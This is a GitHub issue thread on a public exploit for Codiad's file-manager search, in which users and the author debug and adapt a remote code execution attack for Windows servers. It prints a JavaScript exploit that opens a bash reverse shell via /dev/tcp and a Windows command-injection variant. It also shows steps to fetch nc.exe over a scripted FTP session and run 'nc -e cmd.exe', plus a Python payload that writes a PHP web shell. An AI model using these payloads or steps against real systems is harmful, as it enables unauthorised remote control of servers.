error on class.filemanager.php line 208

[REPTILEHAUS]

Hey man - Im coming up against this issue at the moment, any ideas

<b>Notice</b>:  Undefined index: type in <b>C:\xampp\htdocs\development\components\filemanager\class.filemanager.php</b> on line <b>208</b><br />

[WangYihang]

Hi, guy actually, I haven't tested this payload on any windows server, it works on Linux. but now I am a little busy, so I will tell you how to find the reason for this error. if you have learned PHP language, you will be able to debug this error. for solving this problem, you should use debug functions of PHP language, such as print_r, var_dump... and see how this error occurred. thank you.

[ozgur2357]

i got the same error that REPTILEHAUS gets.

[WangYihang]

@ozgur2357 okay, I got it, I will review it right now, thank you for reporting

[WangYihang]

@ozgur2357 Could you offer me some information about your operation system version or php version or codiad version, that will do a lot help for solving this problem. thank you, bro

[ozgur2357]

@WangYihang of course, Windows 7 Professional Edition Service Pack 1, php version 5.6.12 with xampp

[WangYihang]

look, I just change the source code of file: ROOT/components/filenmanager/class.filemanager.php#line244

then use the exploit.js to exploit it, and the browser reported that:

<br />
<b>Notice</b>:  Undefined index: type in <b>C:\phpStudy\PHPTutorial\WWW\components\filemanager\class.filemanager.php</b> on line <b>238</b><br />

but the evil code actually has been executed.

My environment is:

php 5.4.45
windows 10
codiad 2.8.3

[WangYihang]

I got the reason, I have not add the GET arg type in the URL but this arg does not effect us to get a reverse shell you can see the evil command actually been executed The main reason that you didn't get a reverse shell is that the evil code is write for linux(cause windows does not have bash)

[WangYihang]

This exploition is based on a tech which named command injection but it didn't work for windows OS sometimes. maybe we can search with such keywords command injection on windows on web

[WangYihang]

Look, I got some way to inject command on windows platform just like this:

C:\phpStudy\PHPTutorial\WWW>find -L .\ -iregex "*" & dir & echo "*"
找不到文件 - -L
找不到文件 - .\
找不到文件 - -IREGEX
 驱动器 C 中的卷没有标签。
 卷的序列号是 CE19-C138

 C:\phpStudy\PHPTutorial\WWW 的目录

2017/12/23  23:41    <DIR>          .
2017/12/23  23:41    <DIR>          ..
2017/07/26  01:53               567 .editorconfig
2017/07/26  01:53               173 .gitignore

the old exploition is designed for linux because we are able to injection command with \n on linux platform

ip="8.8.8.8";
port="8888";
$.get(
	"/components/project/controller.php?action=get_current",
	function(d){
		p=JSON.parse(d)['data']['path'];
		$.post(
			"/components/filemanager/controller.php?action=search&path="+p,
			{"search_file_type":"\"\n/bin/bash -c 'sh -i >&/dev/tcp/"+ip+"/"+port+" 0>&1'\ngrep \"",}
		);
	}
);

so, we just need to change the exploit to make it fit on windows

ip="8.8.8.8";
port="8888";
command="dir";
$.get(
	"/components/project/controller.php?action=get_current",
	function(d){
		p=JSON.parse(d)['data']['path'];
		$.post(
			"/components/filemanager/controller.php?action=search&path="+p,
			{"search_file_type":'*"&'+command+'&echo "'}
		);
	}
);

Unfortunately we can not get the output of this command dir how can we prove it? using ping, just give it a try so I change the var command to command="ping SERVER_IP"; then use tcpdump to listen on the server SERVER_IP

got it, now we are able to execute any command on windows platform, cool

[WangYihang]

That's so cool, let's try to find someway to get a reverse shell on window, cause windows platform does not bash, so we can not use the bash build-in function to build a revershell maybe we can use python or other binaries, or we can use powershell to generate a revershell

[ozgur2357]

Hi WangYihang, yes i managed to ping the way you said, cool thanks, now i think how to get a shell now like you.

[ozgur2357]

how about upload nc.exe for windows via ftp? but ftp is an interactive app.

[WangYihang]

Of course you can use nc.exe or some other binary virus You can learn how to download file with windows cmd.exe from the following url

https://superuser.com/questions/59465/is-it-possible-to-download-using-the-windows-command-line

[WangYihang]

To download a binary from a ftp server by php function shell_exec we just need to let it type the following words

ftp 192.168.1.143
admin
admin
get nc.exe
quit

then the file will be stored at the current directory so now, we are able to get a reverse shell while using it

nc 8.8.8.8 8888 -e cmd.exe

to make it possible, cause the ftp server is an interactive app, so we should put all the commands into a temp file just like this:

admin
admin
get nc.exe
quit

how to use it, yeah, using the input stream redirection.

ftp 127.0.0.1 < command.txt

how to create the file: command.txt just use

C:\Users\Sun\Desktop\test>echo firstline > command.txt

C:\Users\Sun\Desktop\test>echo secondline >> command.txt

C:\Users\Sun\Desktop\test>type command.txt
firstline
secondline

so, that's the solution. thank you. @ozgur2357 @REPTILEHAUS

[totoroha]

hi Wang, so we should be able to update the code and use it for windows right? can you update your code for windows 7?

[WangYihang]

Okay, I will try it these days in many ways. On Mon, Jan 15, 2018 at 7:25 AM totoroha [email protected] wrote:

hi Wang, so we should be able to update the code and use it for windows right? can you update your code for windows 7?

— You are receiving this because you were mentioned.

Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/2#issuecomment-357551771, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhAWpsOpt_xY212z942DOxLpL7vASks5tKozxgaJpZM4Q0Cen .

[kienast]

Hello Wang , I am really interested into this as well , do you think you will be able to rework the code anytime soon ? Any chance to have a python exploit windows based ? Many thanks !

[WangYihang]

@kienast I will try, but actually, a lot of windows server will not have python installed... so maybe we should use some cmd build-in command... to make the exploitation more robust.

[kienast]

No problem , just let us if someone can test this so we can have a sort of step by step guide for a windows machine , that would be awesome ! thanks

[WangYihang]

@ozgur2357 @kienast @totoroha @REPTILEHAUS Hey, guys, the Windows platform which installed Codiad (<2.8.4) now is available to be exploited. thanks for @mhaskar 's excellent work. (Python version and the JavaScript version is under development.)

[mhaskar]

@WangYihang , Thanks again man , best of luck and we will keep in touch !

[anishmi123]

Hi @mhaskar @WangYihang I am still getting an error saying Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}

My environment is Windows running CODIAD. Can you please help ?

Have edited the code as below - def exploit(domain, username, password, ip, port, path): global session url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path) #payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+ip+'''%2F'''+port+'''+0%3E%261'%0Agrep+%22SniperOJ''' # This is the full payload for windows which escape the command string and execute the command calc.exe # You can replace calc.exe with any command , for example you can use the following command to upload php cmd shell with cmd parameter payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo ""''' windows_payload = 'Hacker"%26cmd.exe echo""' data = "search_string=Hacker&search_file_type=" + windows_payload headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(url, data=data, headers=headers) content = response.content if content == '''{"status":"error","message":"No Results Returned"}''': print "[-] If you see this message immediately, three reasons:" print "\t[+] 1. You just have exited the reverse shell." print "\t[+] 2. The target server cannot access your vps server." print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."

[WangYihang]

Got it, I will check it tonight, and thank you for your reporting anishmi123 [email protected]于2018年3月12日 周一下午1:59写道：

Hi @mhaskar https://github.com/mhaskar @WangYihang https://github.com/wangyihang I am still getting an error saying Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}

My environment is Windows running CODIAD. Can you please help ?

Have edited the code as below - def exploit(domain, username, password, ip, port, path): global session url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path) #payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+ip+'''%2F'''+port+'''+0%3E%261'%0Agrep+%22SniperOJ'''

This is the full payload for windows which escape the command string and

execute the command calc.exe

You can replace calc.exe with any command , for example you can use the

following command to upload php cmd shell with cmd parameter payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo ""''' windows_payload = 'Hacker"%26cmd.exe echo""' data = "search_string=Hacker&search_file_type=" + windows_payload headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(url, data=data, headers=headers) content = response.content if content == '''{"status":"error","message":"No Results Returned"}''': print "[-] If you see this message immediately, three reasons:" print "\t[+] 1. You just have exited the reverse shell." print "\t[+] 2. The target server cannot access your vps server." print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."

— You are receiving this because you were mentioned.

Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/2#issuecomment-372201516, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhH3M3ETpaxFMpHoQfOtG31kTe2w6ks5tdg6vgaJpZM4Q0Cen .

[WangYihang]

Here are some steps may be helpful for you:

1. Check whether the target file (C:/xampp/htdocs/z2.php) exists, if yes, then check the content, if the web shell is written into it, you succeed! You can use some web shell connect tool to manage the server, such as (antSword/中国菜刀)
2. Check whether the target folder (C:/xampp/htdocs/ ) exists, if not, please replace it to the correct folder which is writable and accessible on web
3. If you are able to read/write php code, please locate the file: https://github.com/Codiad/Codiad/blob/master/components/filemanager/class.filemanager.php#L243 Then change the shell_exec function to var_dump/print_r/echo or some print function else Then execute the exploit script again, you can just receive the command to execute, I think you can just put the command in your terminal (cmd), you will figure out the reason (PS: the step 3 is a very important method in debugging or discovering the vulnerabilities. Also you can use other IDE with php debuggers, such as PHPStorm/Eclipse...)

If you have already following the three steps and still not find the reason, please inform me. Finally, thank you for you report and keep in touch

Best

王一航 [email protected]于2018年3月13日 周二上午9:45写道：

Got it, I will check it tonight, and thank you for your reporting anishmi123 [email protected]于2018年3月12日 周一下午1:59写道：

Hi @mhaskar https://github.com/mhaskar @WangYihang https://github.com/wangyihang I am still getting an error saying Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}

My environment is Windows running CODIAD. Can you please help ?

Have edited the code as below - def exploit(domain, username, password, ip, port, path): global session url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path) #payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+ip+'''%2F'''+port+'''+0%3E%261'%0Agrep+%22SniperOJ'''

This is the full payload for windows which escape the command string

and execute the command calc.exe

You can replace calc.exe with any command , for example you can use the

following command to upload php cmd shell with cmd parameter payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo ""''' windows_payload = 'Hacker"%26cmd.exe echo""' data = "search_string=Hacker&search_file_type=" + windows_payload headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(url, data=data, headers=headers) content = response.content if content == '''{"status":"error","message":"No Results Returned"}''': print "[-] If you see this message immediately, three reasons:" print "\t[+] 1. You just have exited the reverse shell." print "\t[+] 2. The target server cannot access your vps server." print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."

— You are receiving this because you were mentioned.

Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/2#issuecomment-372201516, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhH3M3ETpaxFMpHoQfOtG31kTe2w6ks5tdg6vgaJpZM4Q0Cen .